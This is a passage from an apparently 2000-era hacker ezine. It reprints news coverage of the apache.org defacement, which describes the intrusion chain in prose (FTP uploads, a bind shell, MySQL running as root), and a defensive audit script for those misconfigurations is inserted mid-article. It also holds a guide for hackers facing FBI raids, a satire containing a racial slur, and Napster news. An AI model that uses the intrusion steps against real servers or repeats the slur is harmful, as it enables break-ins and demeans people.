"Yes, the www.apache.org site was penetrated," said Ken Coar, a director and vice president of the Apache Software Foundation.

"The penetration was through some network services that were configured with an insufficient degree of paranoia. The penetration was not through the Apache Web server software nor any of the other Apache software, but through standard network utilities found on virtually all Internet servers."

The people who penetrated the Apache.org system likely were "grey hats," Coar said.
The hacker spectrum runs from "black hats," who would break in, do damage, and attempt to avoid tracing, to "white hats," who would note the configuration problems and let the site managers know about them without taking advantage of them.

"These people fall into the 'grey area' in between because they told us about the problems, but not until after they had utilized them to make some apparently innocuous changes," he said.

Cruciphux, publisher of the security and hacking electronic zine HWA.hax0r.news, ezine said the site was defaced around 6:37 p.m. EDT on May 3 by hackers known as "{}" and "Hardbeat."

"{} belongs to Buffer Overflow Security, a fledgling security group consisting of ex-hackers and including people such as "mixter," who wrote TFN, the DDOS-distributed attack tool recently brought to light in the media by denial-of-service attacks on major websites," the ezine wrote.

A mirror of the defaced site can be found on the Attrition.org mirror site and specific details of the break-in can be found on Apache's site.

"They came right out and admitted what had happened and said they were at fault," said OpMan, a New York-based computer systems enthusiast, who noted that "you won't see Microsoft taking the blame for the ILOVEYOU debacle."

"This was a classy hack," Cruciphux said. "It ended almost like a fairy tale. Although tracks were covered and logs cleared, it was decided to alert the apache.org people about the condition and a meeting between the intruders and Apache ensued. Not all defacings go this way, so kiddies remember: It is still very illegal and risky to do this. Be warned."

The Register;
http://www.theregister.co.uk/000506-000002.html

Posted 06/05/2000 7:47pm by Thomas C.
Greene in Washington

Apache.org owned by white hats

Friendly strangers briefly took over the Apache Software Foundation server by exploiting a series of common configuration errors, and then announced their presence by inserting an advertisement for Microsoft at the bottom of the home page. The open-source Apache is the most popular HTTP page server software currently in use.

The intruders gained root access to Apache.org and could have done considerable damage, including replacing the Apache software offered for download with versions containing a Trojan which would have given them access to servers running all subsequent copies downloaded from the Apache.org Web site.

In spite of the damage they could have done, they confined themselves to verifying their exploits, fixing one hole in Apache.org's server configuration, and leaving behind a harmless reminder. They also posted the full details of their exploits.

The intruders originally gained easy access via FTP, discovered a plethora of world-writable directories (tsk, tsk), and installed a simple BIND shell which they could execute remotely via Telnet and from which they learned what services were running and the contents of most directories.

Apache.org was running the BugZilla bug-tracking software, which requires a Mysql account. They found Mysql available locally and running as user root, though the BugZilla documentation warns against running Mysql as root.

"We hacked www.apache.org because there are a lot of servers running apache software and if www.apache.org got compromised, somebody could backdoor the apache server source [code] and end up having lots of owned boxes," the intruders said.

"We just couldn't allow this to happen, we secured the main ftproot==wwwroot thing. While having owned root we just couldn't stand the urge to put that small logo on it."

The intruders, who go by the aliases {} and Hardbeat, showed a bit of purist pride.

"We didn't wanted [sic] to use any buffer overflow or some lame exploit; [our] goal was to reach root with only configuration faults," they explained.

Apache.org took the exploit in the spirit in which it was meant. "They seemed friendly. It would have been nice if they hadn't put the damned Microsoft logo up, but I guess they had to do something to get attention," Apache Software Foundation director Rasmus Lerdorf said in an interview with CNET.

"We can only blame ourselves. It's quite embarrassing, but it's a good little heads-up," Lerdorf reportedly said.

This has to qualify him as the kewlest corporate suit in the known universe. ®

-=-

C|Net;
http://news.cnet.com/news/0-1003-200-1821155.html?tag=st.ne.1002.bgif.ni

Apache site defaced in "embarrassing" hacker attack
By Stephen Shankland
Staff Writer, CNET News.com
May 5, 2000, 12:45 p.m. PT

Intruders defaced the main Web site of the Apache Web server project this week with a fake ad for a rival software package from Microsoft.

A group of intruders broke into the server by exploiting a series of weaknesses, said Rasmus Lerdorf, a member of the Apache Software Foundation board of directors and a programmer at Linuxcare. The intruders limited themselves to inserting the Microsoft advertisement at the bottom of the page, though they could have done much worse damage because they had gained complete control over the computer, he said.

Because of the comparatively mild damage and the fact that the intruders told Apache how their attack worked, Apache termed them "white hats"--helpful hackers, not the more malicious "black hat" category.

"They seemed friendly," Lerdorf said. "It would have been nice if they hadn't put the damned Microsoft logo up, but I guess they had to do something to get attention."

The burgeoning number of computers on the Internet is vastly increasing the opportunity for attackers looking for sites to break into.
At the same time, those computers also are storing more important information, such as credit card numbers or corporate records.

Apache is software used on a server to deliver Web pages to Internet browsers. It's the most commonly used Web server software, running on 60 percent of Web servers, according to a study by Netcraft. Microsoft's Internet Information Server is in second place with 21 percent.

Apache, along with Linux, is among the best-known "open-source" programming projects, in which anyone may see, modify and redistribute the software's original programming instructions. Open-source projects typically are developed by a core group of volunteers, but corporations are increasingly involved as well. IBM and Sun Microsystems in particular have boosted Apache.

The basic problem at Apache was that too many people could install whatever software they wanted on the server, leading to vulnerabilities that stemmed from the different pieces of software interacting, Lerdorf said.

"We just had too many people installing too many services on the box without coordinating with each other," Lerdorf said.

Apache now has shut down two vulnerabilities that led to the attack and has reduced the number of people who have control privileges, he said. In the longer term, Apache will be splitting jobs across several servers, a configuration that allows better security, Lerdorf said.

In a note posted to the Bugtraq security mailing list today, the intruders described how they broke into the server.

Lerdorf said the first stage was that members of the public could store software on the server after sending it with FTP software. The attackers used this feature to save a small program on the machine that later could be used to tell them what files were stored elsewhere on the system.

The intruders then discovered the server had the Bugzilla bug-tracking software produced by Mozilla, the organization building America Online's Netscape Web browser.
A weakness in Bugzilla allowed the attackers to gain complete control over the system, Lerdorf said. Apache shut down Bugzilla completely and will either fix it or replace it with other software, he said.

Lerdorf put a good face on the defacement.

"We can only blame ourselves," Lerdorf said. "It's quite embarrassing, but it's a good little heads-up."

SlashDot;

Posted by jimjag on Thursday May 04, @11:23AM
from the strong-as-the-weakest-link dept.

Yesterday, due to system-level misconfigurations, www.apache.org was defaced after a root-level breakin. Those responsible for finding the holes and the ASF have been in cordial contact, and the holes have been plugged. In the process of doing that, FTP and other services on www.apache.org have been stopped. A mirror of the defaced site can be found on the Attrition.org mirror site. Brian Behlendorf sent the following to various Apache mailing lists:

Hi. We have been made aware (thanks to a very humorous banner ad for Microsoft Back Office on the front of www.apache.org!) that our particular configuration on www.apache.org of ftpd and bugzilla opened a security hole that allowed someone from the outside to get a shell account, and then get root. We have been in contact with those who found the hole, and have closed up the misconfigurations that allowed this.

It is important to note that this is *not* a hole in the Apache web server or related software products. I would encourage double-checking the PGP signatures of Apache releases for the immediate future.

However, I do not believe we are out of the woods yet. Bugzilla has not been thoroughly audited, and while I am not worried about ftpd, simply having another daemon that can write files to the web server whose purpose has been completely superseded by others suggests that taking it down for good is the right idea.

So I am taking down FTP - something that should have been done long ago.
If there are FTP links on any of our pages (or on places like freshmeat) they should be changed to HTTP. There are enough high-quality text-mode HTTP clients that there is no point to having it up, save for mirroring, and we allow rsync and cvsup for that. I will be contacting the mirror site admins list to communicate this.

Also, I have taken down all installations of bugzilla on apache.org until it can be audited. I will be performing a first pass tonight over it, but anyone else familiar with perl and willing to deal with rather ugly code is welcome to do so as well. I will set it back up once I'm comfortable there's been at least one reasonable pass over the whole codebase and any obvious holes have been plugged. This is only life-support though; I really don't think we should be using bugzilla once a suitable replacement is found.

Finally, I think it can be said that this compromise was mostly due to a lack of discipline on the part of those who had root and set up services without considering the ramifications of the way they were installed. I don't want to point fingers, since I'm probably at least as to blame as others, but I do feel that the policy of giving root access to a larger number of people than usual was probably a mistake. Along those lines, I've changed the root password and removed everyone from group wheel but myself - sorry to be fascist about this but I kinda feel like at the end of the day it's my responsibility. We'll come up with a strategy soon about granting sudo access to particular people for particular binaries so that I don't become a bottleneck again.

The details will soon be posted to bugtraq.

Thanks.

LinuxNews.com

Pow-Wow With Apache's Hackers

By Michelle Head

Can you be scalped nicely? Apache seems to think being red in the face beats being red in the accounting department after an embarrassing encounter with some clever and well-meaning hackers.
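
Added example, not part of the reprinted articles or of the intruders' own write-up: a defender-side audit for the three misconfigurations the apache.org reports above name (world-writable directories under the FTP root, ftproot==wwwroot, and a database daemon running as root). The function names are hypothetical, and the paths and daemon names are assumptions supplied by whoever runs it.

```shell
#!/bin/sh
# Audit for the misconfiguration chain named in the apache.org reports:
#   1. world-writable directories reachable through FTP
#   2. FTP root and web document root sharing a tree (ftproot == wwwroot)
#   3. a daemon (e.g. the database) running as root
# Usage: sh audit.sh FTPROOT WWWROOT [daemon-name ...]
# Paths and daemon names are supplied by the caller; nothing here is taken
# from the real apache.org layout.

# Print the physical (symlink-free) path of a directory, or fail.
canon_dir() {
    ( cd "$1" 2>/dev/null && pwd -P )
}

# List directories under $1 whose mode grants write access to "other".
world_writable_dirs() {
    find "$1" -type d -perm -0002 -print 2>/dev/null
}

# Succeed if directory $1 is $2 itself or lies beneath it.
dir_inside() {
    inner=$(canon_dir "$1") || return 2
    outer=$(canon_dir "$2") || return 2
    if [ "$outer" = / ]; then return 0; fi
    case "$inner/" in
        "$outer"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Succeed if either root contains the other, i.e. a file uploaded over
# FTP ends up somewhere the web server will serve or execute it.
roots_overlap() {
    dir_inside "$1" "$2" || dir_inside "$2" "$1"
}

# Read "user command" pairs on stdin (the output format of
# `ps -e -o user= -o comm=`) and print each daemon named in "$@"
# that is running as root.
root_owned_daemons() {
    while read -r user comm; do
        [ "$user" = root ] || continue
        for want in "$@"; do
            if [ "${comm##*/}" = "$want" ]; then printf '%s\n' "$want"; fi
        done
    done | sort -u
}

# Run all checks; print one line per finding, return 1 if there were any.
audit() {
    ftproot=$1; wwwroot=$2; shift 2
    findings=0
    ww=$(world_writable_dirs "$ftproot") || true
    if [ -n "$ww" ]; then
        printf '%s\n' "$ww" | sed 's/^/WORLD-WRITABLE under FTP root: /'
        findings=1
    fi
    if roots_overlap "$ftproot" "$wwwroot"; then
        echo "OVERLAP: FTP root and web root share a tree: $ftproot $wwwroot"
        findings=1
    fi
    if [ "$#" -gt 0 ]; then
        asroot=$(ps -e -o user= -o comm= | root_owned_daemons "$@")
        if [ -n "$asroot" ]; then
            printf '%s\n' "$asroot" | sed 's/^/RUNS AS ROOT: /'
            findings=1
        fi
    fi
    return "$findings"
}

# Only audit when invoked with at least FTPROOT and WWWROOT.
[ "$#" -lt 2 ] || audit "$@"
```

A non-zero exit status means at least one of the three conditions was found; each finding is printed on its own line.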
With the IT world still bobbing confusedly in the wake of the Microsoft Outlook love bug, the Open Source Internet Servicer, which currently runs over 60% of the Web sites on the Internet, was targeted by hackers Friday. The intruders, who declined to damage or disrupt the site, instead marked their trail with a modified Microsoft logo.

Shortly afterwards, the hackers described their harmless heads-up in full detail on the Internet in a step-by-step tutorial, identifying themselves as Hardbeat and {}. The site describes how configuration errors allowed the two access to Apache--and how, instead of damaging the site, they simply posted an amusing warning and secured the site from other, less well-meaning prowlers on their way out.

Asked if this hack was meant to protect a major Open Source project, Hardbeat responded, "We did this hack because we could. The possible risks mentioned in the paper (Trojanning Apache source) were really an afterthought. We did this because Apache.org is a high-profile site, and these configuration problems are common. Therefore, defacing Apache.org would be a great way to draw attention to these errors."

{} described his background. "I am a coder, everything I write (like a Linux kernel security patch named auditfile) is Open Source," {} volunteered. "I work at a local monkey zoo and at a Cable ISP." {} intends to start formal training in computers next year.

Hardbeat's background in Open Source is less extensive. "I have written one Open Source tool (http://www.dataloss.net/midentd). It's [available under the GNU (GNU's Not UNIX) General Public License (GPL)] but the next version will not be. It is also no longer maintained, because I am too busy. In daily life, I go to University (I am in my first year of Computer Science) and I have a job as a systems administrator/developer at a big hosting company in The Netherlands. I have no professional training," Hardbeat explained. "It's all experience."
Hardbeat commented on the hackers' choice of a Microsoft logo for their marker. "Let's start by stating that that had no political meaning--we were looking for a subtle way to show we had that kind of access, without damaging anything or hindering people in their business at www.apache.org," he wrote.

"We also figured that would draw a teensy little bit of extra attention," he continued, "and you asking this question shows that it does. :) Also note that this was not an official M$ logo," he added. "A friend of ours who works as a graphic designer did this thing for us."

On whether Apache is their first (or last) mission, the happy hackers have no comment. "If we have anything to share we will, but privacy is a high good," Hardbeat explained.

Hardbeat and {} hoped Apache would have "the only correct reaction to such a hack--to talk to the people who did it, and not sue them when they had no bad intentions."

The pair hoped to educate Apache rather than upset them. "Talk to them, ask them what they did and especially how they did it," Hardbeat advised. "That way they will stay friendly to you and help you fix the problems in a quick and reliable way."

"Apache reacted above these hopes, being friendly and responsive, complimenting us `you guys are clever!', `Good work, guys'" Hardbeat reported.

Apparently Apache's director was grateful for the warning. "They seemed friendly. It would have been nice if they hadn't put the damned Microsoft logo up, but I guess they had to do something to get attention," Apache Software Foundation director Rasmus Lerdorf said in an interview with CNET.

"We can only blame ourselves. "It's quite embarrassing, but it's a good little heads-up,"

About the Author:

Michelle Head is an experienced author who decided to plunge into the world of Linux journalism. Michelle is a new Linux enthusiast and is excited about the Linux community. She welcomes feedback on her articles and would love to hear ideas for future articles.
She can be reached at Michellh@LinuxMall.com.

@HWA

32.0 [IND] The Goat Files: mindphasr talks more about his bust.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(selected files from www.goat-security.org)

http://www.goat-advisory.org/texts/goat-gH-busted.txt

"Everything a hacker needs to know about getting busted" part 2 by mindphasr (gH)

***note: Although g0at security mocks gH quite a bit, we still have somewhat good relations with the busted mindphasr. I asked mindphasr to write something like this for goat-advisory.org, instead it is being released under gH, we do however have exclusive distro rights to this, thus the reason why it is up here....

..::gH Release 040900:..
..::mindphasr@attrition.org:..

* Converted from a scratch pad into a .txt file by John Welder a.k.a. "Ansle"

"EVERYTHING A HACKER NEEDS TO KNOW ABOUT GETTING BUSTED PART 2"

:PREFACE:
A. INTRODUCTION
B. THE RAID
C. CHARGES
D. GETTING A DEFENSE
E. INDICTMENT
F. PLEA AGREEMENTS
G. HEADING TO COURT
H. YOUR FUTURE
I. THE END

:PREFACE:

This file is being written for the sole purpose to be informative. I take no responsibility for anything that is done with this file in mind. This file may be freely copied to bulletin board systems, text archives or print material. All I ask is proper credits are given to the author(s).

- mindphasr / April 5th 2000

A. INTRODUCTION

Nowadays, after very popular movies such as "Hackers" and "The Matrix" the hacker world has much been glamorized as something most people will see as something very interesting. However, what is not shown is the real consequences of what could happen in the end. There have been so-called hacker groups popping up all over, many of which last about as long as a 10 dollar bill laying on the road. In the past 5 years I have gone through many things in the scene.
I have seen people trusted by the community turn into FBI informants, I have seen looked up to people in the scene turn into FBI informants, I have also seen best friends turn their backs. This is all part of the so-called hacker world. Many individuals these days will do anything they can to gain respect in the scene, however many are unaware what may come of this.

I have been through one of the most highly publicized hacker incidents in the last decade, and unfortunately have also gone through the court battles. The battles I hope this document will help most get through. However, this document will be focused primarily on the legal issues involved and what to and to not do.

I write this with much respect for Agent Steal's 1997 file "Everything a hacker needs to know about getting busted". I am going to go over some things that have not been covered in his file. It is an excellent file, read it, read it many times. You may obtain his text file at http://www.attrition.org/~modify/texts/scene/everything.busted.html . Enjoy.

B. THE RAID

This is probably when it will hit home for most of you. You may suddenly realize what you have done is not so harmless. You will most likely be awakened from a sleep between 6am-9am. You will get to hear the infamous FBI knock. They knock louder than anyone you have ever heard, you will know it's them. If you do not open the door within a minute or so they will not hesitate to open the door themselves. If you are in an apartment complex, they will have a key. If you are at your home, they will have a bigger key that will knock your door down.

It will usually be a few FBI agents and then local law enforcement 'assisting'. They don't care if you're a 9 year old or a 40 year old. They do it all the same. When they come in they will find you and grab you and drag you somewhere safe where they can search you. In most cases that will be outside your apartment or house.
They will have their guns drawn, so doing something stupid at this point would not be bright at all. They will then handcuff you and bring you back inside and set you down on a couch or a nice chair. Get comfortable you may be sitting there awhile.

An agent will then proceed to tell you they are going to search your place, make sure you ask for the search warrant. A key to look for here is who the warrant is written out to. In most cases your local police will NOT have a warrant issued to them, do not let them go through your stuff. Leave it to the FBI. There is actually a good reason for this, the FBI will not and cannot issue citations for drugs, underage drinking, etc. If the police see it they will write you up. You don't need that. They like to get sneaky and try to get you to agree and make you think they have one. They will NOT always have one.

After you overlook the warrant, they will then proceed to tear your place apart. They will search everything, I mean everything. In fire alarms, behind posters, in attic, under rugs, in refrigerator, in tape decks, in your garbage.

While the agents are executing the search one designated agent will be there to try and get you to talk to them. You have heard it before and you will hear it again many times: DO NOT SPEAK WITH ANY OF THEM, KEEP YOUR MOUTH SHUT! NOTHING YOU SAY WILL DO YOU ANY GOOD. When you decide not to speak with them chances are they will get a little testy. That's their problem. I suggest you do not say a single word while they are there other than "May I see the warrant?" You don't have to; it's your right to remain silent.

In most cases they will not arrest you. They will leave. They will also try and say bye to you and get you to call them back. This is a controversial situation, some people say call them back and try to cooperate. However, in my experiences it gets you nowhere. So don't bother.

Before they leave, make sure you get a copy of the search warrant and the "Search & Seizure" form.
That form will allow you to get your things back. If it is not written down on there, you will not receive them back. Check it over before they leave.

C. CHARGES

In most cases after the raid you will not hear from the FBI for quite some time. Some cases, never again. They tend to take their time. Charges will follow. They will be back to execute yet another search warrant, however most cases this will have to be a voluntary execution. They will most likely be back with a list of charges being brought forward. They will then ask you if they can execute a search warrant. If you say no they will say a cocky line such as "Oh, that doesn't matter we can get one within 1 hour, and we will let the judge know you're not cooperating." This is the point where you may want to cooperate somewhat. They can keep you in custody.

They will arrest you and bring you in front of the nearest Magistrate (which is a fancy term for an off-duty judge). He will then decide whether you should be kept in custody or not. In my case, I was brought downtown to the courthouse and put in a real nice office and put on a teleconference with a Magistrate and he discussed with the FBI agents if I should be kept in custody or not, and if not what my conditions of release should be. This is where the agents may say you are not cooperating. I was released on a signature bond and restricted from coming within 10 feet of a computer.

D. GETTING A DEFENSE

Depending on your case, you are going to have to decide what kind of lawyer to get. In federal cases there really is no such thing as "Public Defender". What they do is put together a bunch of lawyers who would like to work federal cases to extend their resumes. They then pick from a "hat" to come up with a lawyer to represent you. In my case, I was hooked up with a very very nice lawyer. So therefore I did not have to go out and spend my life savings on legal fees. However, you could get the so-called shaft and get a sucky PD wannabe.
In this case you are going to want to go searching for a lawyer who has experience in this sort of law. Those kinds are becoming easier and easier to find these days. Depending on your wallet you are going to want to find one you can afford and yet still be able to eat afterwards.

E. INDICTMENT

This is sort of a downtime. You must wait for the Grand Jury to come back with an indictment on your charges. This will happen 99% of the time. This is when the charges are official. Most indictments will have extra charges tacked on that the government themselves know they cannot prove. These will be used for "Plea Bargain" situations. Such as "You plea to count 1 and 3, we will drop 2 and 4" You get the idea.

F. EVIDENCE

Be prepared, you are going to be surprised at what the government has on you, and your 'conspirators.' You are going to want to file a "Motion for Discovery" which will require the government to hand over all their "discovery" materials. This will include photocopies of paperwork obtained at their raids, stuff from others. Statements made by others against you. And of course hardware. You get the point.

The government will go over this very closely and pick apart everything. They like to link everything together, even if it's not called for. They will do it. They will most likely go through your drives and link together things to make you look like a monster. They will also pin you down as part of a conspiracy if you are involved with more than one person, such as in my case. If you are lucky they won't file additional conspiracy charges.

G. HEADING TO COURT

Once the indictment is presented, and then you have to make some very important decisions. These could affect your future. First off, are you clearly guilty of the items and can they be proven? If so, common sense tells you not to spend your life fortune to hire a lawyer who will lie for you. In most computer cases there is substantial evidence that is rather blatant.
Such as phone logs that will show exactly what you did. If you believe you are being targeted for things that cannot be proven. Go ahead fight it. In most cases the government will try to tack on a few extra charges, which are rather irrelevant and they know cannot be proven. However, these are used for plea bargain situations. I will discuss that a bit more in the next section.

So far, in this file I have taken a much better look at Federal crimes. Since unfortunately that is all I have personal experience in. In federal cases all court dates will be one of the Federal Courthouses. You most likely will have to drive a ways to get to it. Each state has at least two federal courthouses. This will vary depending on where you are.

F. PLEA AGREEMENTS

They will be offered. Sometimes they will be bad, sometimes they will be good. Do NOT take the first one presented to you. This is usually an agreement, which lets the government know how guilty you really think you are. They will offer more than one. If you have a good lawyer he will be in contact with the US Attorney and will try to work something more practical out. It happens in most cases.

This is a very important thing to think about. If you do not accept a plea agreement, then you can risk your case in court. However if you lose, you may be wishing you had accepted an agreement. You can't go back and accept it later. Think about this, think about this long and hard. If you decide to accept one, make sure you read the WHOLE agreement over, several times. They like to hide things in there. Be careful of what you sign.

G. SENTENCING

Let's skip ahead here. Let's say you are found guilty of something. Then the next phase is sentencing. This can be a wreck to most people and their families. Sentencings in federal cases go by the United States Sentencing Guidelines aka U.S.S.G. It is a point scale. They will take your criminal history, your cooperation, the damage caused, i.e. and add points up and minus points off.
They will come up with a number. This number will decide the sentencing range.

In my case there was quite a problem with this. My lawyers added up a number of 8. The government had a number of 9. Because of the disagreement on damage caused. The 1-point difference was about 5 months different in imprisonment. The judge has the discretion to not use the point system. However, my case was sort of a precedent being set. If the point were 8, I would have gotten 0-6 months. However, the minimum sentence in the code for the sub Section 1030 crime was 6 months. So that caused a problem. Could the judge go less than 6? He clearly could according to the U.S.S.G. but not according to the law. He elected to rule out the points, and go with the book. I was given 6 months. The very minimum. Even though the government was looking for 28 months :)

The judge may also decide where to put you. In my case I was sentenced to a Federal Half-Way house. I was lucky, there was room and I did not have to spend anytime in a Federal Prison. I have not been to the halfway house yet however, so I will leave information on that to be put in a revision down the road.

H. YOUR FUTURE

Now, after your stint in the Federal holding center. You will most likely be not allowed to speak with any of your ex-friends. Not use a computer. Let all employers know of your past. Be on probation. Not be allowed to profit from your story. All these things come as part of your sentence. You will have to report to a probation office, be drug tested. Have to contact her of any police contacts, if you are leaving your district. It will not be fun. I got the maximum probation, which is 3 years for my case. I will deal with it. If I can I'm sure you can :)

I. THE END

Well, I hope this was a help to you. This along with Agent Steal's text I am sure you can get a very good understanding of the whole situation. I am not here to tell what to and not to do. Remember, I have gone through it. I know how it is.
If you are going to do these activities please remember these things. As long as you talk to the right people (Stay away from John Vransevich @ AntiOnline, Carolyn Meinel @ HappyHacker) and be very careful when you do things. Slipping up once, may make these text files reality.

I admire and respect the following people and organizations very much for their friendship and help over the past 5 years, you have been a big part of my life whether you know it or not:

Organizations: Global Hell(gH), cha0s inc., Cult of the Dead Cow, h4gis, l0pht, Attrition, Hacker News Network, Pure Security Networks, Help Net Security, 100% Bikkel(RIP), Defcon, Rootfest, 2600-gb2600, FinalDream inc.,

Individuals: MostHateD, altomo, Zyklon, Taylor, shekk, Debris, ech0, Jericho, McIntyre, flesh, obsolete, LoopHole, aeonflux, SoulBlaze, Rewn, Kuruption, Cryzydopey, diesl0w, socked, spacerog, Agent Steal, Kevin Mitnick, Ted Bridis, Brock Meeks.

@HWA

33.0 [IND] The Goat Files: "Hackers unite - a goat security expose"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(selected files from www.goat-security.org)

04/24/00

///////////////////////////////////////////
GGGGGG  OOOOOOO  AAAAAAAA  TTTTTTTTTT
G       O     O  A      A      TT
G  GGG  O     O  AAAAAAAA      TT
G    G  O     O  A      A      TT
GGGGGG  OOOOOOO  A      A      TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[g0at] http://www.goat-advisory.org [g0at]
-=g0at media productions=-

((Hackers unite))-((A goat security expose))

In a most terrifying move by the biggest names in the underground community, representatives of Global Hell (gH), the Shot Down Crew (sDc) and the Brotherhood of Warez (BoW) have announced a merger making them the biggest and more powerful hacker group the Eris Free net's IRC network has ever seen. g0at security [http://www.goat-advisory.org] has taken upon itself the mission of getting to the bottom of this alarming event and discovering the reasoning behind it.
Recently, a member of g0at security visited Global Hell leader, Patrick Gregory (aka Mosthated) in his new home, a United States federal penitentiary where he is serving 5 years. Upon entering the prison library, where we were to interview Gregory, we found him sitting on the lap of another inmate tapping away at the keyboard of the prison computer. When asked what he was working on, Gregory replied saying that he had recently reformatted the computer and installed the latest version of Linux Mandrake as opposed to Microsoft Windows 95 since microsoft products are lame. He then went on to tell us that to occupy time in prison, he has downloaded Microsoft Visual Basic 6 and has been running it with the latest version of Wine in the KDE environment. A full interview follows.

GS - g0at security
MH - Patrick Gregory

GS: Can you confirm a merger between Global Hell and other well known underground groups?

MH: Yes, Global Hell is merging with two other groups.

GS: What groups are these?

MH: The Shot Down Crew and the Brotherhood of Warez.

GS: What is the reasoning behind this merger?

MH: Well as you may know, since the FBI investigation commenced in the Summer of 1999, gH has slowly been dying out. Many of our members have taken off in fear of being raided, some were arrested, and gH's two leaders are now serving time. We have lost our stronghold on the internet and we must regain this in order to show the public stability in our organization.

GS: Why is stability in Global Hell required for the general public to see?

MH: The gH ran security site (http://www.pure-security.net) has been growing gradually over the past half year and we need to raise some capital in order to increase our expansion. Pure Security Networks, is announcing that it has filed to go public (IPO) in May of 2000.

GS: An IPO? Please expand on this...

MH: Well, May 23 2000, Pure Security Networks under the symbol of PSN, will be trading on the Nikkei 225.
Common shares will start at $0.32, no preferred shares are being offered.

GS: During this expansion of Pure Security Networks, what new services will be offered?

MH: Well we have negotiated a contract with the government of Zaire to offer internet connectivity to local schools. Also we plan on beginning mutual fund and retirement consultations along with helping script kiddies create investment portfolios.

g0at security then went on to get the Smack Down Crew's side of the story. g0at security found members of the group on the James Joyce appreciation BBS located in Dublin, Ireland. When asked about the merger and various questions related to the IPO, sDc representatives respond with the same uniform answer, "Whachoo talkin bout foo". They then went on ranting about how they own goats. They ended the interview with a very befuddled quote. "Dem goats better rememba somethin foo, mess with the best, die like the rest". We were then expelled and banished for life from using the James Joyce appreciation BBS.

Finally, g0at security went on to get the story from the Brotherhood of Warez. g0at security met with a member of the group, sw_r on a popular IRC channel, #solace on efnet which appeared to have been taken over by some goats. When asked about the reasoning behind the merger and IPO, he went on to quote us this:

"Back in the day, I was a member of the MOST elite hacker group ever, the Masters of Deception. MOD was so much more elite then LOD. FUCK the LOD, they should all rot in hell. God I hate Eric Bloodaxe, that neegro is going to get it. Friggin hick, show them texas boys what I'm made of. Anyways, a book was written about the MOD and how we kicked the LOD's asses! Those stupid authors (Michele Slatalla and Joshua Quittner) didn't include me in their friggin book! They should DIE! I own them. I own them all. So with this IPO, I hope to buy out the Harperperennial Library and ruin those damned authors carriers. I'll show them who the elite one is.
Not that twirp PhiberOptik, I own his ass. I'll school him in DNS anyday".

g0at representatives then proceeded to back away very slowly until there was enough distance for us to run away, fast, very fast. Call your brokers folks, this hot new IPO is expected to rise, fast, very fast.

In final notes, this new group being dubbed, the Planet Hackers Club should not be messed with. Already they have waged war with other groups such as DevilSoul and the Pakistan Hackers club. Routers everywhere are in major trouble. We hoped this expose was helpful and informative and all further questions should be directed to members of this new merged group.

@HWA

34.0 [MM] Napster boots 317,377 users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"So, what the heck is Napster? Napster is a completely new way of thinking about music online. Imagine...an application that takes the hassle out of searching for MP3s. No more broken links, no more slow downloads, and no more busy, disorganized FTP sites. With Napster, you can locate and download your favorite music in MP3 format from one convenient, easy-to-use interface."

- From the Napster site.

ZDNet news; http://www.zdnet.com/zdnn/stories/news/0,4586,2566773,00.html

Napster boots 317,377 users

Earlier this month, Metallica presented Napster with a list of users who it claimed had violated the band's copyrights.

By Margaret Kane, ZDNet News
UPDATED May 10, 2000 9:58 AM PT

Online music vendor Napster Inc. said it has removed 317,377 users who have been accused of violating copyrights off its Web site.

The action was taken in response to a request from heavy metal band Metallica, which filed suit against Napster in April.

Last week Metallica presented Napster with a list of users who it claimed had violated the band's copyrights. The band provided Napster with a list of user names; file names of allegedly infringed music for each user; and the time, date and IP address of the Napster server to which the user was connected.
The list did not contain IP addresses of the users.

Rapper Dr. Dre announced Wednesday he will submit names to Napster for removal from the system, according to attorney Howard King, who also represents Metallica.

Napster's technology allows users to copy digital music files from one another.

"We intend to fully comply with the DMCA (Digital Millennium Copyright Act) and our policies," reads a statement posted on the Napster site. "We will take down all users Metallica has alleged, under penalty of perjury, to be infringing."

The company said users who feel they have been banned by mistake will be given the opportunity to submit a "counter notification" form.

Metallica obtained the users' IDs by monitoring the service over a two-day period. Napster said it did not give Metallica personal information, such as names and addresses, about the users who have been kicked off.

Metallica's attorney said last month that the band submitted the names at Napster's request. Dr. Dre also filed suit against Napster last month.

The ban will only extend to users who shared versions of commercially released songs and would not apply to "bootleg" recordings made at concerts.

Marilynn Wheeler, ZDNet News, contributed to this report.

Napster's Press Release:
~~~~~~~~~~~~~~~~~~~~~~~

http://www.napster.com/metallica-notice.html

Information About Metallica's Request To Disable Napster Users

On Wednesday, May 3, 2000, Napster received a delivery from the band Metallica of 13 boxes of paper notifying us of Napster users alleged to be infringing Metallica and its related entities' copyrights. On Thursday afternoon, May 4, Metallica sent computerized lists of 317,377 Napster user names alleged to be infringing Metallica's copyrights. Metallica has requested that, in compliance with the notice and takedown policies outlined in the Digital Millennium Copyright Act ("DMCA"), Napster act expeditiously to disable all of these users.

We intend to fully comply with the DMCA and our policies.
We will take down all users Metallica has alleged, under penalty of perjury, to be infringing.

Conversely, the DMCA affords certain protections to users. Namely, a user who is banned from the service deserves the opportunity for reinstatement in the event that there has been a genuine mistake or misidentification of the materials made available by that user. Users who feel they have been banned as a result of a mistake or misidentification of content may submit a "counter notification" form.

The Napster software will direct all users barred as a result of Metallica's allegations to an infringement notification page. That page explains the notice that Metallica has given us, explains who Metallica has stated to us it intends to block, and gives the user an opportunity to submit a counter notification if the user has been misidentified. If the user has been misidentified, and requests to be reinstated by submitting a counter notification under penalty of perjury, then, unless Metallica chooses to pursue legal action against that user within 10 working days of being notified of that user's counter notification, the user is entitled to be reinstated.

We at Napster respect the privacy rights of our users. We currently keep our users' personal information, including personal names, e-mail addresses, street address, or other data separate and distinct from users' Internet activities. That information was not disclosed to Metallica, or to its related business entities Creeping Death Music, or E/M ventures, or any other entity. Napster collects information at registration solely for the purpose of better understanding who its audience is. Of course, if you subsequently send Napster e-mails, other correspondence, or a "counter notification" that identifies both your user name and your real name or e-mail address, that information does become recorded in combination.
